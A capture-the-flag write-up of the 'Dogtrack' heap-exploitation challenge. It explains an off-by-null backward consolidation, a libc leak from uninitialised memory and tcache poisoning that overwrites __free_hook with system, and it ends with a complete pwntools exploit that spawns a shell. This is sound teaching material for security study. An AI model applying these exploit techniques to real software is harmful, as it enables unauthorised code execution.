Intro#

Dogtrack is a dog racing themed pwn challenge from Batman’s Kitchen CTF 2026. We can exploit a Null-Byte Off-By-One in the heap chained with a write primitive to achieve code execution.

1
    Arch:       amd64-64-little
2
    RELRO:      Full RELRO
3
    Stack:      Canary found
4
    NX:         NX enabled
5
    PIE:        PIE enabled
6

7
    Libc:       2.27

TLDR:

Old Libc: No tcache hardenings and __free_hook still works
Off-By-One to clear PREV_INUSE and backwards consolidate
Hidden function (not shown in the menu) allows you to swap values on 2 chunks
Use the overlaping chunks and the swap -> Tcache Poison and overwrite __free_hook

Code Review#

By analysing the challenge with Binary Ninja, we can identify that 2 types of chunks are tracked internally in separate arrays:

Dog: 3 chunks size 0x30
Record: 15 chunks size 0x100

Dogs and Records Arrays

The functions (as-per the UI) are:

New Dog with name (32 bytes) and speed (8 bytes)
Free Dog
Run Race: Creates new Record, with the first qwords being the dog’s name that ran the race
Free Record
Read Record

Analysing the free functions, we can see that the pointers are NULLed and checked before use, so no easy UAFs:

Dog pointer set to NULL

Record pointer set to NULL

The race (record malloc) function has some complexity related to simulating the random races, but the relevant part is the following:

A dog’s name is copied to the beginning of the chunk
Chunks are created with malloc, which unlike calloc does not zero the memory. Therefore, creating a record for a dog with no name may allow us read data left from a previously allocated chunk, leaking libc/heap pointers.

1
/* not the actual decompiled code: I removed some of the type casting for readability */
2

3
if (option == 2)
4
{
5
  puts("Which dog do you want to race?");
6
  printf("Kennel Index > ");
7

8
  if (scanf_consume_newline("%d", &kennel_idx) == 1 && kennel_idx >= 0 && kennel_idx <= 2)
9
  {
10
      if (*((kennel_idx << 3) + &dogs)) // Check if pointer is NULL
11
      {
12
          int64_t* dog = *((kennel_idx << 3) + &dogs); // points to dog chunk
13
          char* record = malloc(0xf0); // Does not null memory
14

15
          for (int32_t j = 0; j <= 0x1f; j += 1)
16
          {
17
              if (!*(uint8_t*)((char*)dog + (int64_t)j + 8))
18
                  break;
19

20
              // Copy dog's name
21
              record[(int64_t)j] = *(uint8_t*)((char*)dog + (int64_t)j + 8);
22
          }
23

24
          *(record + 0x20) = time(nullptr);
25
          *(record + 0x28) = 0;
26

27
          for (int32_t j_1 = 0; j_1 <= 7; j_1 += 1)
28
          {
29
              printf("\n%s now entering Race %d: %s!\n", &dog[1], j_1 + 1, &races[j_1 * 0x18]);
30
              puts("3... 2... 1... Go!");
31

32
              <snip>

Hidden swap records function#

On the UI, only the aforementioned functions are shown: Records Menu

However, checking the Records related functions in the decompiler, there is a hidden 4th option:

1
else if (option == 4)
2
{
3
  puts("CAUTION! FORGING RECORDS IS ILLEGAL");
4
  puts("Select a record");
5
  printf("Record index > ");
6

7
  if (scanf_consume_newline("%d", &record_idx_1) == 1 && record_idx_1 >= 0 && record_idx_1 <= 0xf)
8
  {
9
      if (*(uint64_t*)(((int64_t)record_idx_1 << 3) + &winRecords))
10
      {
11
          char* record_1 = *(uint64_t*)(((int64_t)record_idx_1 << 3) + &winRecords);
12
          puts("Select a record to swap with");
13
          printf("Record Index > ");
14

15
          if (scanf_consume_newline("%d", &record_idx_2) == 1 && record_idx_2 >= 0 && record_idx_2 <= 0xf)
16
          {
17
              if (*(uint64_t*)(((int64_t)record_idx_2 << 3) + &winRecords))
18
              {
19
                  char* record_2 = *(uint64_t*)(((int64_t)record_idx_2 << 3) + &winRecords);
20
                  int64_t temp;
21
                  __builtin_memset(&temp, 0, 0x20);
22
                  int64_t val_1 = *(uint64_t*)(record_1 + 0x20);
23
                  *(uint64_t*)(record_1 + 0x20) = *(uint64_t*)(record_2 + 0x20);
24
                  *(uint64_t*)(record_2 + 0x20) = val_1;
25
                  strcpy(&temp, record_1);
26
                  strcpy(record_1, record_2);
27
                  strcpy(record_2, &temp);
28
                  printf("Record %d and %d have been swapped!\n", (uint64_t)record_idx_1, (uint64_t)record_idx_2);
29
                  continue;
30
              }
31
              else
32
              {
33
                  printf("Record %d doesn't exist!\n", (uint64_t)record_idx_2);
34
                  continue;
35
              }
36
        <snip>
37
}

The function allows us to swap up to 4 qwords (the dog’s name) between chunks. This will be used for a Tcache Poison later!

Off-By-Null on Dog Creation#

The dog creation function allows us so set a name (32 bytes) and speed (8 bytes):

Dog chunk menu

Then, it attempts to null terminate the name buffer, however, a name of length 32 causes it to off-by-one and set to NULL the next chunk’s SIZE field.

Dog chunk creation

Multiple techniques exist to exploit this scenario depending on the libc version, including things like shrinking chunks and The poisoned NUL byte.

Given we can only easily allocate 0x30 and 0x100 chunks, our best bet is clearing the PREV_INUSE bit on the SIZE field of a 0x100 chunk, i.e. turning 0x101 to 0x100!

Null-Byte Off-By-One Backwards Consolidation#

Background Information#

Normally, when a chunk is free’d to the unsortedbins, the heap attempts to consolidate with adjacent chunks to reduce fragmentation. We can use that to our advantage given our ability to clear the PREV_INUSE flag, we can trick the heap into believing the previous chunk is free and consolidate with it.

For our attack, the relevant fields are:

The SIZE field, more specifically the PREV_INUSE flag on the LSB of SIZE
PREV_SIZE

Chunk metadata Diagram

From MallocInternals Wiki:

NOTE
Since all chunks are multiples of 8 bytes, the 3 LSBs of the chunk size can be used for flags. These three flags are defined as follows:

A (0x04) Allocated Arena - the main arena uses the application’s heap. Other arenas use mmap’d heaps. If this bit is 0, the chunk comes from the main arena and the main heap.

M (0x02) MMap’d chunk - this chunk was allocated with a single call to mmap and is not part of a heap at all.

P (0x01) Previous chunk is in use - if set, the previous chunk is still being used by the application, and thus the prev_size field is invalid.

The attack#

Given that the challenge is running an older version of libc, fewer checks are in place, so we only need to make sure that:

prev_size adds up to a valid chunk header (else it might SIGSEV)
Said chunk is free (will trigger corrupted size vs. prev_size if it isn’t a valid free chunk)
The chunk has valid FD and BK pointers (Safe Unlink Check), as it will be unlinked from its original bin to be consolidated
- P->fd->bk == P
- P->bk->fd == P

For the exploit we can setup the following heap layout:

1
 _______________
2
|       | 0x101 | <- Target free chunk to be merged
3
|   Record[0]   |
4
|   FD  |   BK  |
5
|      ...      |
6
|_______________|
7
|       | 0x101 | <- Extra space
8
|   Record[1]   |
9
|      ...      |
10
|      ...      |
11
|_______________|
12
|       |  0x31 | <- This will Off-By-One and clear the PREV_INUSE of Record[2]
13
|   Dog[0/1]    |
14
|      ...      |
15
|_______________|
16
| 0x230 | 0x101 | <- PREV_SIZE: 0x230 = 0x100 + 0x100 + 0x30
17
|   Record[2]   |    SIZE will be changed from 0x101 to 0x100
18
|      ...      |
19
|      ...      |
20
|_______________|

Given that we can’t edit() a Dog chunk (we only write during initial allocation), we first need to setup our heap layout layout, free the dog chunk, so it can be allocated later on for the attack.

Another requirements is that Record[0] and Record[2] need to be freed to the unsortedbins, so we will need to fill-up the tcache before freeing them. This can be done with a simple for-loop.

Putting it all together, our exploit becomes:

1
warn("Setting up heap layout for backwards consolidation")
2
info("Creating Dog without a name so it does not overwrite our leaks later")
3
new_dog(0, b"", b"")
4

5
info("Creating Record that will be merged")
6
new_record(0)
7

8
info("Creating middle Record[1] so we have more space after consolidation")
9
new_record(0)
10

11
info("Creating overflow Dog[0], will be used for Off-By-Null later on")
12
new_dog(1, b"BBBB", b"BBBB")
13

14
info("Creating Record[2] that will have its prev_in_use bit cleared")
15
new_record(1)
16

17
info("Freeing overflow chunk so it can be used later")
18
free_dog(1)
19

20

21
warn("Filling Tcache 0x100")
22
info("Creating 7 Records")
23
for i in range(3,10):
24
    new_record(0)
25

26
info("Freeing 7 records")
27
for i in range(3,10): # Record[3] to Record[9]
28
    free_record(i)

Heap Layout Step 1

Now we just need to free Record[0] and trigger the Off-By-One

1
warn("Performing backwards consolidation")
2
info("Freeing Record[0] that will be merged (unsorted bin)")
3
free_record(0)
4

5
info("Triggering Dog[2] off-by-null, with a prev_size of 0x230")
6
new_dog(2, b"A"*0x18+p64(0x230), b"B"*0x8)

Heap Layout Step 2

Finally we free Record[2] to trigger the consolidation

1
info("prev_in_use has been cleared! Consolidating chunks")
2
free_record(2)

Heap Layout Step 3

Now we have a free chunk with active chunks (Record[1] and Dog[2]) overlapping it!

From now on, multiple exploitation strategies are possible…

Given that we are on an older libc with __free_hook and less Tcache protection, I figured allocatting a Record overlaping Dog[2] and using the hidden swap_records() function would be a fun way to poison Tcache!

To do that Record[1] will be used to leak a libc pointer, and Dog[2] will be used as part of the tcache poisoning.

But before that, we need to get some Leaks!

Leaking Libc#

As noted earlier, creating records does not zero the memory, so we may read stored metadata from previous allocations. We just need to do our record creation with a dog that has no name, to avoid overwriting said metadata!

For a Heap Leak (which isn’t actually used in this specific exploit), we can just read from Record[1].

TIP
A note on read_record(): The function calls ctime() to parse the stored record time, which calls a bunch of mallocs for timezone metadata: However, this only happens once. So a good spot to place a dummy call to read_record() would be after the 7 mallocs to fill the tcache, so it is very far away and doesn’t mess up our heap layout by allocating from our consolidated chunk:

For the Libc Leak, we should first exhaust the Tcache so we can allocate from our consolidated chunk, then, it is just a matter of allocating 2 Records and reading from Record[8]:

Leak Libc

Tcache Poison#

Those last 2 allocations are also very convenient, as the next allocation will point to the same address as the still active Dog[2], changing its SIZE from 0x30 to 0x100 as part of the remaindering of our consolidated chunk.

Dog 2 Pointer

Dog 2 Chunk Size

This will enable us to poison the tcache, as we can free the Dog[2] to Tcache 0x100 and still have a valid Record pointer to it!

With a valid Record pointer to a free chunk, we can use swap_records() to overwrite the FD and point it to the __free_hook.

NOTE
Malloc Hooks allowed developers to intercept/modify the behaviour of memory allocation/deallocation by passing the call to a different function when malloc()/free() gets called.
Due to their security risks and not being thread-safe, they were deprecated on glibc 2.32 and removed on glibc 2.34: Securing malloc in glibc: Why malloc hooks had to go

So the exploit goes as follows:

Allocate Record[10] overlapping with Dog[2]

Record Pointer Overlap

Setup Record[11] pointing to the __free_hook

1
warn("Preparing __free_hook overwrite")
2
info("Allocating Dog[1] with a __free_hook pointer")
3
new_dog(1,p64(libc.symbols.__free_hook),b"")
4
info("Allocating Dog[0] with a pointer to system")
5
free_dog(0)
6
new_dog(0,p64(libc.symbols.system),b"")
7
info("Creating Record[11] from Dog[1], it now holds a pointer to the __free_hook")
8
new_record(1)

Record pointing to the free hook

Free Dog[2] to send Record[10] to the tcache

Record 10 on Tcache

Now Record[10] is both free on the tcache, and valid as a Record pointer. Therefore we can Use-After-Free and write to it, corrupting the FD.

Use swap_records(Record[10],Record[11]) to change Record[10]‘s FD to point to __free_hook

Before the swap: Tcache Pointing to a normal chunk

After the swap: Tcache pointing to hook

Now, subsequent Record allocations from the tcache will allow us to overwrite __free_hook

By preparing a Dog named system’s address, and creating said Record over the __free_hook, we overwrite-it to point to system()

Overwrite __free_hook with system()

1
info("Using secret function to swap Record[10]'s FD and Record[11] (__free_hook_pointer)")
2
swap_records(10,11)
3
info("Allocating dummy Record, the next unsortedbin allocation will overlap __free_hook")
4
new_record(0)
5

6
#...
7

8
warn("Overwriting the __free_hook with system")
9
new_record(0) # now free hook points to system

hook overwritten with system

With the __free_hook overwritten, we can just setup a Record with /bin/sh\0 (by naming a Dog /bin/sh\0 and creating a Record from it) and calling free() on it, which will trigger system(/bin/sh) and give us a shell

Final Exploit#

Exploit animation

1
#!/usr/bin/env python3
2

3
from pwn import *
4

5
exe = ELF("dogtrack")
6
libc = ELF("libc.so.6")
7
ld = ELF("ld-linux-x86-64.so.2")
8

9
context.gdb_binary = '/usr/local/bin/pwndbg'
10

11
def conn(argv=[], *a, **kw):
12
    if args.REMOTE:
13
        io = remote('dogtrack-instanceID.instancer.batmans.kitchen', 1337, ssl=True)
14
    else:
15
        if args.GDB:
16
            io = gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
17
        else:
18
            io = process([exe.path] + argv, *a, **kw)
19
    return io
20

21
gdbscript = '''
22
tbreak main
23
continue
24
'''.format(**locals())
25

26
#===========================================================
27
#                           UTILS
28
#===========================================================
29

30
numRecords = 0
31

32
def int2byte(x):
33
    return str(x).encode('ascii')
34

35
def new_dog(kennel_index, name, speed):
36
    debug(f"""New dog: {kennel_index}
37
    - malloc(0x28)
38
    - name: {name}
39
    - speed: {speed}""")
40
    io.sendlineafter(b'4) Quit\n> ', b'1')
41
    io.sendlineafter(b'3) Leave\n> ', b'1')
42
    io.sendlineafter(b'Kennel Index > ', int2byte(kennel_index))
43
    io.sendlineafter(b'(Max 32 characters) > ', name)
44
    io.sendlineafter(b'(Max 8 characters) > ', speed)
45
    io.sendlineafter(b'3) Leave\n> ', b'3')
46

47
def free_dog(kennel_index):
48
    debug(f"free dog: {kennel_index}")
49
    io.sendlineafter(b'4) Quit\n> ', b'1')
50
    io.sendlineafter(b'3) Leave\n> ', b'2')
51
    io.sendlineafter(b'Kennel Index > ', int2byte(kennel_index))
52
    io.sendlineafter(b'3) Leave\n> ', b'3')
53

54
def new_record(kennel_index):
55
    global numRecords
56
    debug(f"""new record {numRecords}
57
    - malloc(0xf0)
58
    - kennel_index: {kennel_index}
59
    """)
60
    io.sendlineafter(b'4) Quit\n> ', b'2')
61
    io.sendlineafter(b'Kennel Index > ', int2byte(kennel_index))
62
    numRecords += 1
63
    return numRecords - 1
64

65
def read_record(record_index):
66
    debug(f"Reading record {record_index}")
67
    io.sendlineafter(b'4) Quit\n> ', b'3')
68
    io.sendlineafter(b'3) Leave\n> ', b'1')
69
    io.sendlineafter(b'Record index > ', int2byte(record_index))
70
    out = io.recvuntil(b"Welcome to the Hall of Fame!")
71
    io.sendlineafter(b'3) Leave\n> ', b'3')
72
    return out.replace(b'\nWelcome to the Hall of Fame!', b'')
73

74
def free_record(record_index):
75
    global numRecords
76
    debug(f"free record {record_index}")
77
    io.sendlineafter(b'4) Quit\n> ', b'3')
78
    io.sendlineafter(b'3) Leave\n> ', b'2')
79
    io.sendlineafter(b'Record index > ', int2byte(record_index))
80
    io.sendlineafter(b'3) Leave\n> ', b'3')
81

82
def trigger_free_hook(record_index):
83
    debug(f"Triggering free hook enjoy the shell")
84
    io.sendlineafter(b'4) Quit\n> ', b'3')
85
    io.sendlineafter(b'3) Leave\n> ', b'2')
86
    success("Enjoy your shell :)")
87
    io.sendlineafter(b'Record index > ', int2byte(record_index))
88

89
def swap_records(record_index_1, record_index_2):
90
    debug(f"Swapping records {record_index_1} and {record_index_2}")
91
    io.sendlineafter(b'4) Quit\n> ', b'3')
92
    io.sendlineafter(b'3) Leave\n> ', b'4')
93
    io.sendlineafter(b'Record index > ', int2byte(record_index_1))
94
    io.sendlineafter(b'Record Index > ', int2byte(record_index_2))
95
    io.sendlineafter(b'3) Leave\n> ', b'3')
96

97
#===========================================================
98
#                          EXPLOIT
99
#===========================================================
100

101

102
io = conn()
103

104
warn("Setting up heap layout for backwards consolidation")
105
info("Creating Dog without a name so it does not overwrite our leaks later")
106
new_dog(0, b"", b"")
107
info("Creating Record that will be merged")
108
new_record(0)
109
info("Creating middle Record so we have more space after consolidation")
110
new_record(0)
111
info("Creating overflow Dog, will be used for Off-By-Null later on")
112
new_dog(1, b"BBBB", b"BBBB")
113
info("Creating Record that will have its prev_in_use bit cleared")
114
new_record(1)
115
info("Freeing overflow chunk so it can be used later")
116
free_dog(1)
117

118
warn("Filling Tcache 0x100")
119
info("Creating 7 Records")
120
for i in range(3,10):
121
    new_record(0)
122

123
debug("Calling read to create the ctime metadata now, so it avoids breaking the exploit later")
124
read_record(9)
125

126
info("Freeing 7 records")
127
for i in range(3,10):
128
    free_record(i)
129

130
warn("Performing backwards consolidation")
131
info("Freeing Record that will be merged (unsorted bin)")
132
free_record(0)
133
info("Triggering Dog[2] off-by-null, with a prev_size of 0x230")
134
new_dog(2, b"A"*0x18+p64(0x230), b"B"*0x8)
135
info("prev_in_use has been cleared! Consolidating chunks")
136
free_record(2)
137

138
warn("Emptying Tcache, further allocation from unsortedbins may overlap previous chunks")
139
for i in range(0,7):
140
    new_record(0)
141

142
warn("Leaking Libc and Heap")
143
new_record(0)
144
new_record(0)
145
leak_libc = u64(read_record(8).split(b'\n')[0][5:].ljust(8, b'\x00'))
146
leak_heap = u64(read_record(1).split(b'\n')[0][5:].ljust(8, b'\x00')) << 12
147
libc.address = leak_libc - (libc.symbols.main_arena + 896)
148
info(f"Heap Base: {leak_heap:#x}")
149
info(f"Leak Libc: {leak_libc:#x}")
150
assert libc.address & 0xFFF == 0, "Invalid Libc Address"
151
success(f"Libc Address: {libc.address:#x}")
152

153
warn("Creating overlap between Record[10] and Dog[2]")
154
info("Allocating chunk that will overlap Dog[2]")
155
new_record(0) # record 10 overlaps dog 2
156

157
warn("Preparing __free_hook overwrite")
158
info("Allocating Dog[1] with a __free_hook pointer")
159
new_dog(1,p64(libc.symbols.__free_hook),b"")
160
info("Allocating Dog[0] with a pointer to system")
161
free_dog(0)
162
new_dog(0,p64(libc.symbols.system),b"")
163
info("Creating Record[11] from Dog[1], it now holds a pointer to the __free_hook")
164
new_record(1)
165

166
warn("Poisoning tcache 0x100")
167
info("Freeing a random record to increase the tcache count")
168
free_record(2)
169
info("Freeing Dog[2]")
170
free_dog(2)
171
info("Using secret function to swap Record[10]'s FD and Record[11] (__free_hook_pointer)")
172
swap_records(10,11)
173
info("Allocating dummy Record, the next unsortedbin allocation will overlap __free_hook")
174
new_record(0)
175

176
info("Setting up Dog[1] named /bin/sh")
177
free_dog(1)
178
new_dog(1,b"/bin/sh\0",b"")
179

180
warn("Overwriting the __free_hook with system")
181
new_record(0) # now free hook points to system
182
info("Creating Record[13] with /bin/sh from Dog[1]")
183
new_record(1)
184

185
warn('Freeing Record[13] to trigger __free_hook = system("/bin/sh")')
186
trigger_free_hook(13)
187
io.interactive()